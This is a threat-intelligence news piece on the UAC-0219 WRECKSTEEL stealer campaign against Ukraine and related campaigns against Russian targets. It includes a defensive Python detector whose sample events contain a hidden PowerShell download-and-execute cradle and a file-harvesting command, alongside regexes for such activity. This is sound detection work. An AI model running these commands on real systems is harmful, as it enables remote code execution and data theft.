The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that at least three cyber attacks have been recorded against state administration bodies and critical infrastructure facilities in the country with an aim to steal sensitive data.
The campaign, the agency said, involved the use of compromised email accounts to send phishing messages containing links pointing to legitimate services like DropMeFiles and Google Drive. In some instances, the links are embedded within PDF attachments.
The digital missives sought to induce a false sense of urgency by claiming that a Ukrainian government agency planned to cut salaries, urging the recipient to click on the link to view the list of affected employees.

Visiting these links leads to the download of a Visual Basic Script (VBS) loader that is designed to fetch and execute a PowerShell script capable of harvesting files matching a specific set of extensions and capturing screenshots.
The activity, attributed to a threat cluster tracked as UAC-0219, is said to have been ongoing since at least fall 2024, with early iterations using a combination of EXE binaries, a VBS stealer, and a legitimate image editor called IrfanView to achieve its goals.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. The attacks have not been attributed to any country.
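As an added illustration (not CERT-UA's or the reporting's own code), the loader chain described above can be surfaced from endpoint process-creation telemetry: a script host (wscript.exe or cscript.exe) spawning PowerShell whose command line pulls a remote script or enumerates files by extension. The key=value event layout, field names and sample lines are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (simplified key=value layout, not real telemetry).
SAMPLE_EVENTS = [
    r'host=WS01 parent=C:\Windows\System32\wscript.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c (New-Object Net.WebClient).DownloadString(<placeholder-url>) | IEX"',
    r'host=WS02 parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell Get-Process"',
    r'host=WS03 parent=C:\Windows\System32\cscript.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -c Get-ChildItem -Recurse -Include *.docx,*.pdf | Copy-Item -Destination $env:TEMP\out"',
    r'host=WS04 parent=C:\Windows\System32\wscript.exe image=C:\Windows\System32\notepad.exe cmdline="notepad readme.txt"',
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="value with spaces"
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)
HARVEST_RE = re.compile(r"Get-ChildItem.*-Include\s+\*\.\w+", re.I)   # file collection by extension
SCREENSHOT_RE = re.compile(r"CopyFromScreen|System\.Drawing", re.I)   # screen-capture APIs


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into fields; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Reasons an event matches the script-host -> PowerShell loader chain; empty if none."""
    if basename(event.get("parent", "")) not in SCRIPT_HOSTS:
        return []
    if basename(event.get("image", "")) != "powershell.exe":
        return []
    reasons = ["powershell spawned by wscript/cscript"]
    cmd = event.get("cmdline", "")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download cradle in command line")
    if HARVEST_RE.search(cmd):
        reasons.append("file enumeration by extension")
    if SCREENSHOT_RE.search(cmd):
        reasons.append("screen capture API referenced")
    return reasons


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map host -> reasons for every event that matches the chain."""
    findings: Dict[str, List[str]] = {}
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            findings[event.get("host", "?")] = reasons
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags WS01 (download cradle) and WS03 (file enumeration) while leaving the explorer-launched PowerShell and the notepad child untouched; in production the parent/image check alone is noisy on hosts that run logon scripts, so the command-line signals are what should drive alert severity.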

The development comes as Kaspersky warned that the threat actor known as Head Mare has targeted several Russian entities with a malware known as PhantomPyramid that is capable of processing instructions issued by the operator over a command-and-control (C2) server, as well as downloading and running additional payloads like MeshAgent.
Russian energy companies, industrial enterprises, and organizations that supply and develop electronic components have also been on the receiving end of phishing attacks mounted by a threat actor codenamed Unicorn that dropped a VBS trojan designed to siphon files and images from infected hosts.

Late last month, SEQRITE Labs revealed that academic, governmental, aerospace, and defense-related networks in Russia are being targeted by weaponized decoy documents, likely sent via phishing emails, as part of a campaign dubbed Operation HollowQuill. The attacks are believed to have started around December 2024.

The activity uses social engineering ploys, disguising malware-laced PDFs as research invitations and government communiqués to entice unsuspecting users into triggering the attack chain.
"The threat entity delivers a malicious RAR file which contains a .NET malware dropper, which further drops a Golang-based shellcode loader along with the legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload," security researcher Subhajeet Singha said.